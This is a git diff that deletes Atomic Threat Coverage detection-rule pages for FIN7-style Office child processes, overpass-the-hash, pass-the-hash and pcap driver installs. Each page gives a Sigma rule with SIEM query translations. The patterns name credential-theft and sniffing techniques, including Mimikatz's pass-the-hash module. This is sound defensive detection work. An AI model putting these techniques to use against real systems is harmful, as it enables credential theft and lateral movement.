-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1202: Indirect Command Execution](../Triggers/T1202.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c](sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c)</li><li>[https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign](https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign)</li></ul>  |
-| **Author**               | Jason Lynch |
-| Other Tags           | <ul><li>FIN7</li><li>car.2013-05-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: MS Office Product Spawning Exe in User Dir
-id: aa3a6f94-890e-4e22-b634-ffdfd54792cc
-status: experimental
-description: Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio
-references:
-    - sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c
-    - https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign
-tags:
-    - attack.execution
-    - attack.defense_evasion
-    - attack.t1059
-    - attack.t1202
-    - FIN7
-    - car.2013-05-002
-author: Jason Lynch 
-date: 2019/04/02
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage:
-            - '*\WINWORD.EXE'
-            - '*\EXCEL.EXE'
-            - '*\POWERPNT.exe'
-            - '*\MSPUB.exe'
-            - '*\VISIO.exe'
-            - '*\OUTLOOK.EXE'
-        Image:
-            - 'C:\users\\*.exe'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "ParentImage.*.*\\WINWORD.EXE" -or $_.message -match "ParentImage.*.*\\EXCEL.EXE" -or $_.message -match "ParentImage.*.*\\POWERPNT.exe" -or $_.message -match "ParentImage.*.*\\MSPUB.exe" -or $_.message -match "ParentImage.*.*\\VISIO.exe" -or $_.message -match "ParentImage.*.*\\OUTLOOK.EXE") -and ($_.message -match "Image.*C:\\users\\.*.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:(*\\WINWORD.EXE OR *\\EXCEL.EXE OR *\\POWERPNT.exe OR *\\MSPUB.exe OR *\\VISIO.exe OR *\\OUTLOOK.EXE) AND winlog.event_data.Image.keyword:(C\:\\users\\*.exe))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/aa3a6f94-890e-4e22-b634-ffdfd54792cc <<EOF
-{
-  "metadata": {
-    "title": "MS Office Product Spawning Exe in User Dir",
-    "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio",
-    "tags": [
-      "attack.execution",
-      "attack.defense_evasion",
-      "attack.t1059",
-      "attack.t1202",
-      "FIN7",
-      "car.2013-05-002"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\WINWORD.EXE OR *\\\\EXCEL.EXE OR *\\\\POWERPNT.exe OR *\\\\MSPUB.exe OR *\\\\VISIO.exe OR *\\\\OUTLOOK.EXE) AND winlog.event_data.Image.keyword:(C\\:\\\\users\\\\*.exe))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\WINWORD.EXE OR *\\\\EXCEL.EXE OR *\\\\POWERPNT.exe OR *\\\\MSPUB.exe OR *\\\\VISIO.exe OR *\\\\OUTLOOK.EXE) AND winlog.event_data.Image.keyword:(C\\:\\\\users\\\\*.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'MS Office Product Spawning Exe in User Dir'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:(*\\WINWORD.EXE *\\EXCEL.EXE *\\POWERPNT.exe *\\MSPUB.exe *\\VISIO.exe *\\OUTLOOK.EXE) AND Image.keyword:(C\:\\users\\*.exe))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\WINWORD.EXE" OR ParentImage="*\\EXCEL.EXE" OR ParentImage="*\\POWERPNT.exe" OR ParentImage="*\\MSPUB.exe" OR ParentImage="*\\VISIO.exe" OR ParentImage="*\\OUTLOOK.EXE") (Image="C:\\users\\*.exe")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage IN ["*\\WINWORD.EXE", "*\\EXCEL.EXE", "*\\POWERPNT.exe", "*\\MSPUB.exe", "*\\VISIO.exe", "*\\OUTLOOK.EXE"] Image IN ["C:\\users\\*.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\WINWORD\.EXE|.*.*\EXCEL\.EXE|.*.*\POWERPNT\.exe|.*.*\MSPUB\.exe|.*.*\VISIO\.exe|.*.*\OUTLOOK\.EXE))(?=.*(?:.*C:\users\\.*\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_overpass_the_hash.md b/Atomic_Threat_Coverage/Detection_Rules/win_overpass_the_hash.md
deleted file mode 100644
index 3ca3d0f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_overpass_the_hash.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Successful Overpass the Hash Attempt       |
-|:-------------------------|:------------------|
-| **Description**          | Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1075: Pass the Hash](https://attack.mitre.org/techniques/T1075)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Runas command-line tool using /netonly parameter</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html](https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html)</li></ul>  |
-| **Author**               | Roberto Rodriguez (source), Dominik Schaudel (rule) |
-| Other Tags           | <ul><li>attack.s0002</li><li>attack.t1550.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Successful Overpass the Hash Attempt
-id: 192a0330-c20b-4356-90b6-7b7049ae0b87
-status: experimental
-description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.
-references:
-    - https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html
-author: Roberto Rodriguez (source), Dominik Schaudel (rule)
-date: 2018/02/12
-tags:
-    - attack.lateral_movement
-    - attack.t1075
-    - attack.s0002
-    - attack.t1550.002
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4624
-        LogonType: 9
-        LogonProcessName: seclogo
-        AuthenticationPackageName: Negotiate
-    condition: selection
-falsepositives:
-    - Runas command-line tool using /netonly parameter
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4624" -and $_.message -match "LogonType.*9" -and $_.message -match "LogonProcessName.*seclogo" -and $_.message -match "AuthenticationPackageName.*Negotiate") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4624" AND winlog.event_data.LogonType:"9" AND winlog.event_data.LogonProcessName:"seclogo" AND winlog.event_data.AuthenticationPackageName:"Negotiate")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/192a0330-c20b-4356-90b6-7b7049ae0b87 <<EOF
-{
-  "metadata": {
-    "title": "Successful Overpass the Hash Attempt",
-    "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1075",
-      "attack.s0002",
-      "attack.t1550.002"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.LogonType:\"9\" AND winlog.event_data.LogonProcessName:\"seclogo\" AND winlog.event_data.AuthenticationPackageName:\"Negotiate\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.LogonType:\"9\" AND winlog.event_data.LogonProcessName:\"seclogo\" AND winlog.event_data.AuthenticationPackageName:\"Negotiate\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Successful Overpass the Hash Attempt'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4624" AND LogonType:"9" AND LogonProcessName:"seclogo" AND AuthenticationPackageName:"Negotiate")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4624" LogonType="9" LogonProcessName="seclogo" AuthenticationPackageName="Negotiate")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4624" logon_type="9" logon_process="seclogo" AuthenticationPackageName="Negotiate")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4624)(?=.*9)(?=.*seclogo)(?=.*Negotiate))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_pass_the_hash.md b/Atomic_Threat_Coverage/Detection_Rules/win_pass_the_hash.md
deleted file mode 100644
index cf8eb4e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_pass_the_hash.md
+++ /dev/null
@@ -1,189 +0,0 @@
-| Title                    | Pass the Hash Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the attack technique pass the hash which is used to move laterally inside the network |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1075: Pass the Hash](https://attack.mitre.org/techniques/T1075)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administrator activity</li><li>Penetration tests</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events](https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events)</li></ul>  |
-| **Author**               | Ilias el Matani (rule), The Information Assurance Directorate at the NSA (method) |
-| Other Tags           | <ul><li>car.2016-04-004</li><li>attack.t1550.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Pass the Hash Activity
-id: f8d98d6c-7a07-4d74-b064-dd4a3c244528
-status: experimental
-description: Detects the attack technique pass the hash which is used to move laterally inside the network
-references:
-    - https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events
-author: Ilias el Matani (rule), The Information Assurance Directorate at the NSA (method)
-date: 2017/03/08
-tags:
-    - attack.lateral_movement
-    - attack.t1075
-    - car.2016-04-004
-    - attack.t1550.002
-logsource:
-    product: windows
-    service: security
-    definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624, a failed logon attempt would trigger an event ID 4625
-detection:
-    selection:
-        - EventID: 4624
-          LogonType: '3'
-          LogonProcessName: 'NtLmSsp'
-          WorkstationName: '%Workstations%'
-          ComputerName: '%Workstations%'
-        - EventID: 4625
-          LogonType: '3'
-          LogonProcessName: 'NtLmSsp'
-          WorkstationName: '%Workstations%'
-          ComputerName: '%Workstations%'
-    filter:
-        AccountName: 'ANONYMOUS LOGON'
-    condition: selection and not filter
-falsepositives:
-    - Administrator activity
-    - Penetration tests
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.message -match "LogonType.*3" -and $_.message -match "LogonProcessName.*NtLmSsp" -and $_.message -match "WorkstationName.*%Workstations%" -and $_.message -match "ComputerName.*%Workstations%" -and ($_.ID -eq "4624" -or $_.ID -eq "4625")) -and  -not ($_.message -match "AccountName.*ANONYMOUS LOGON")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_data.LogonType:"3" AND winlog.event_data.LogonProcessName:"NtLmSsp" AND winlog.event_data.WorkstationName:"%Workstations%" AND winlog.ComputerName:"%Workstations%" AND (winlog.event_id:"4624" OR winlog.event_id:"4625")) AND (NOT (winlog.event_data.AccountName:"ANONYMOUS\ LOGON")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f8d98d6c-7a07-4d74-b064-dd4a3c244528 <<EOF
-{
-  "metadata": {
-    "title": "Pass the Hash Activity",
-    "description": "Detects the attack technique pass the hash which is used to move laterally inside the network",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1075",
-      "car.2016-04-004",
-      "attack.t1550.002"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_data.LogonType:\"3\" AND winlog.event_data.LogonProcessName:\"NtLmSsp\" AND winlog.event_data.WorkstationName:\"%Workstations%\" AND winlog.ComputerName:\"%Workstations%\" AND (winlog.event_id:\"4624\" OR winlog.event_id:\"4625\")) AND (NOT (winlog.event_data.AccountName:\"ANONYMOUS\\ LOGON\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_data.LogonType:\"3\" AND winlog.event_data.LogonProcessName:\"NtLmSsp\" AND winlog.event_data.WorkstationName:\"%Workstations%\" AND winlog.ComputerName:\"%Workstations%\" AND (winlog.event_id:\"4624\" OR winlog.event_id:\"4625\")) AND (NOT (winlog.event_data.AccountName:\"ANONYMOUS\\ LOGON\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Pass the Hash Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((LogonType:"3" AND LogonProcessName:"NtLmSsp" AND WorkstationName:"%Workstations%" AND ComputerName:"%Workstations%" AND (EventID:"4624" OR EventID:"4625")) AND (NOT (AccountName:"ANONYMOUS LOGON")))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (LogonType="3" LogonProcessName="NtLmSsp" WorkstationName="%Workstations%" ComputerName="%Workstations%" (EventCode="4624" OR EventCode="4625")) NOT (AccountName="ANONYMOUS LOGON"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (logon_type="3" logon_process="NtLmSsp" WorkstationName="%Workstations%" ComputerName="%Workstations%" (event_id="4624" OR event_id="4625"))  -(AccountName="ANONYMOUS LOGON"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*3)(?=.*NtLmSsp)(?=.*%Workstations%)(?=.*%Workstations%)(?=.*(?:.*(?:.*4624|.*4625)))))(?=.*(?!.*(?:.*(?=.*ANONYMOUS LOGON)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_pass_the_hash_2.md b/Atomic_Threat_Coverage/Detection_Rules/win_pass_the_hash_2.md
deleted file mode 100644
index f7abf3f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_pass_the_hash_2.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Pass the Hash Activity 2       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the attack technique pass the hash which is used to move laterally inside the network |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1075: Pass the Hash](https://attack.mitre.org/techniques/T1075)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administrator activity</li><li>Penetration tests</li></ul>  |
-| **Development Status**   | production |
-| **References**           | <ul><li>[https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events](https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events)</li><li>[https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis](https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis)</li><li>[https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/](https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/)</li></ul>  |
-| **Author**               | Dave Kennedy, Jeff Warren (method) / David Vassallo (rule) |
-| Other Tags           | <ul><li>attack.t1550.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Pass the Hash Activity 2
-id: 8eef149c-bd26-49f2-9e5a-9b00e3af499b
-status: production
-description: Detects the attack technique pass the hash which is used to move laterally inside the network
-references:
-    - https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events
-    - https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis
-    - https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/
-author: Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)
-date: 2019/06/14
-tags:
-    - attack.lateral_movement
-    - attack.t1075
-    - attack.t1550.002
-logsource:
-    product: windows
-    service: security
-    definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624
-detection:
-    selection:
-        - EventID: 4624
-          SubjectUserSid: 'S-1-0-0'
-          LogonType: '3'
-          LogonProcessName: 'NtLmSsp'
-          KeyLength: '0'
-        - EventID: 4624
-          LogonType: '9'
-          LogonProcessName: 'seclogo'
-    filter:
-        AccountName: 'ANONYMOUS LOGON'
-    condition: selection and not filter
-falsepositives:
-    - Administrator activity
-    - Penetration tests
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4624" -and (($_.message -match "SubjectUserSid.*S-1-0-0" -and $_.message -match "LogonType.*3" -and $_.message -match "LogonProcessName.*NtLmSsp" -and $_.message -match "KeyLength.*0") -or ($_.message -match "LogonType.*9" -and $_.message -match "LogonProcessName.*seclogo"))) -and  -not ($_.message -match "AccountName.*ANONYMOUS LOGON")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"4624" AND ((winlog.event_data.SubjectUserSid:"S\-1\-0\-0" AND winlog.event_data.LogonType:"3" AND winlog.event_data.LogonProcessName:"NtLmSsp" AND winlog.event_data.KeyLength:"0") OR (winlog.event_data.LogonType:"9" AND winlog.event_data.LogonProcessName:"seclogo"))) AND (NOT (winlog.event_data.AccountName:"ANONYMOUS\ LOGON")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8eef149c-bd26-49f2-9e5a-9b00e3af499b <<EOF
-{
-  "metadata": {
-    "title": "Pass the Hash Activity 2",
-    "description": "Detects the attack technique pass the hash which is used to move laterally inside the network",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1075",
-      "attack.t1550.002"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4624\" AND ((winlog.event_data.SubjectUserSid:\"S\\-1\\-0\\-0\" AND winlog.event_data.LogonType:\"3\" AND winlog.event_data.LogonProcessName:\"NtLmSsp\" AND winlog.event_data.KeyLength:\"0\") OR (winlog.event_data.LogonType:\"9\" AND winlog.event_data.LogonProcessName:\"seclogo\"))) AND (NOT (winlog.event_data.AccountName:\"ANONYMOUS\\ LOGON\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4624\" AND ((winlog.event_data.SubjectUserSid:\"S\\-1\\-0\\-0\" AND winlog.event_data.LogonType:\"3\" AND winlog.event_data.LogonProcessName:\"NtLmSsp\" AND winlog.event_data.KeyLength:\"0\") OR (winlog.event_data.LogonType:\"9\" AND winlog.event_data.LogonProcessName:\"seclogo\"))) AND (NOT (winlog.event_data.AccountName:\"ANONYMOUS\\ LOGON\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Pass the Hash Activity 2'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4624" AND ((SubjectUserSid:"S\-1\-0\-0" AND LogonType:"3" AND LogonProcessName:"NtLmSsp" AND KeyLength:"0") OR (LogonType:"9" AND LogonProcessName:"seclogo"))) AND (NOT (AccountName:"ANONYMOUS LOGON")))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4624" ((SubjectUserSid="S-1-0-0" LogonType="3" LogonProcessName="NtLmSsp" KeyLength="0") OR (LogonType="9" LogonProcessName="seclogo"))) NOT (AccountName="ANONYMOUS LOGON"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="4624" ((SubjectUserSid="S-1-0-0" logon_type="3" logon_process="NtLmSsp" key_length="0") OR (logon_type="9" logon_process="seclogo")))  -(AccountName="ANONYMOUS LOGON"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*4624)(?=.*(?:.*(?:.*(?:.*(?=.*S-1-0-0)(?=.*3)(?=.*NtLmSsp)(?=.*0))|.*(?:.*(?=.*9)(?=.*seclogo)))))))(?=.*(?!.*(?:.*(?=.*ANONYMOUS LOGON)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_pcap_drivers.md b/Atomic_Threat_Coverage/Detection_Rules/win_pcap_drivers.md
deleted file mode 100644
index c5481e8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_pcap_drivers.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Windows Pcap Drivers       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Windows Pcap driver installation based on a list of associated .sys files. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1040: Network Sniffing](https://attack.mitre.org/techniques/T1040)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1040: Network Sniffing](../Triggers/T1040.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more](https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more)</li></ul>  |
-| **Author**               | Cian Heasley |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Windows Pcap Drivers
-id: 7b687634-ab20-11ea-bb37-0242ac130002
-status: experimental
-description: Detects Windows Pcap driver installation based on a list of associated .sys files.
-author: Cian Heasley
-date: 2020/06/10
-references:
-    - https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more
-tags:
-    - attack.discovery
-    - attack.credential_access
-    - attack.t1040
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 4697
-        ServiceFileName:
-          - '*pcap*'
-          - '*npcap*'
-          - '*npf*'
-          - '*nm3*'
-          - '*ndiscap*'
-          - '*nmnt*'
-          - '*windivert*'
-          - '*USBPcap*'
-          - '*pktmon*'
-    condition: selection
-fields:
-    - EventID
-    - ServiceFileName
-    - Account_Name
-    - Computer_Name
-    - Originating_Computer
-    - ServiceName
-falsepositives:
-    - unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "4697" -and ($_.message -match "ServiceFileName.*.*pcap.*" -or $_.message -match "ServiceFileName.*.*npcap.*" -or $_.message -match "ServiceFileName.*.*npf.*" -or $_.message -match "ServiceFileName.*.*nm3.*" -or $_.message -match "ServiceFileName.*.*ndiscap.*" -or $_.message -match "ServiceFileName.*.*nmnt.*" -or $_.message -match "ServiceFileName.*.*windivert.*" -or $_.message -match "ServiceFileName.*.*USBPcap.*" -or $_.message -match "ServiceFileName.*.*pktmon.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"4697" AND winlog.event_data.ServiceFileName.keyword:(*pcap* OR *npcap* OR *npf* OR *nm3* OR *ndiscap* OR *nmnt* OR *windivert* OR *USBPcap* OR *pktmon*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7b687634-ab20-11ea-bb37-0242ac130002 <<EOF
-{
-  "metadata": {
-    "title": "Windows Pcap Drivers",
-    "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.",
-    "tags": [
-      "attack.discovery",
-      "attack.credential_access",
-      "attack.t1040"
-    ],
